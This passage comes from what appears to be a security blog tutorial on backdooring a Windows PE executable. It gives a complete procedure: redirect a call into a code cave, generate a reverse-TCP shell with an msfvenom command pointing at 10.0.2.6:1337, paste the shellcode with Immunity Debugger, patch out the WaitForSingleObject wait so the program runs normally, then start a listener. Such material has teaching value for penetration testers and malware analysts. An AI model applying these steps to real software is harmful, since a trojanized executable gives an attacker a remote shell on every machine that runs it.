„new“ adress for our overwritten call instruction which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instrution at the entry point via „jmp 0x01067FD8“ and the execution will flow. #0x03 Inject Shellcode Choose your favourit shellcode or generate a new one . I used following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex Then use the binary paste function of Immunity to replace some of our nops with the shellcode. Save the file and voila, you sucessfully backdoored a PE-File ! Ok, just one thing is missing. The shellcode of msfvenom used the WaitForSingleObject function and the default values prevent the application to execute until the shell is released. To solve this change the „DEC ESI“ code at the end of the shellcode with a nop. 0x04 PoC Start your listener and fire up the application. Thanks for reading and if you like this post, check my twitter account please! xD Source: hansesecure.de
×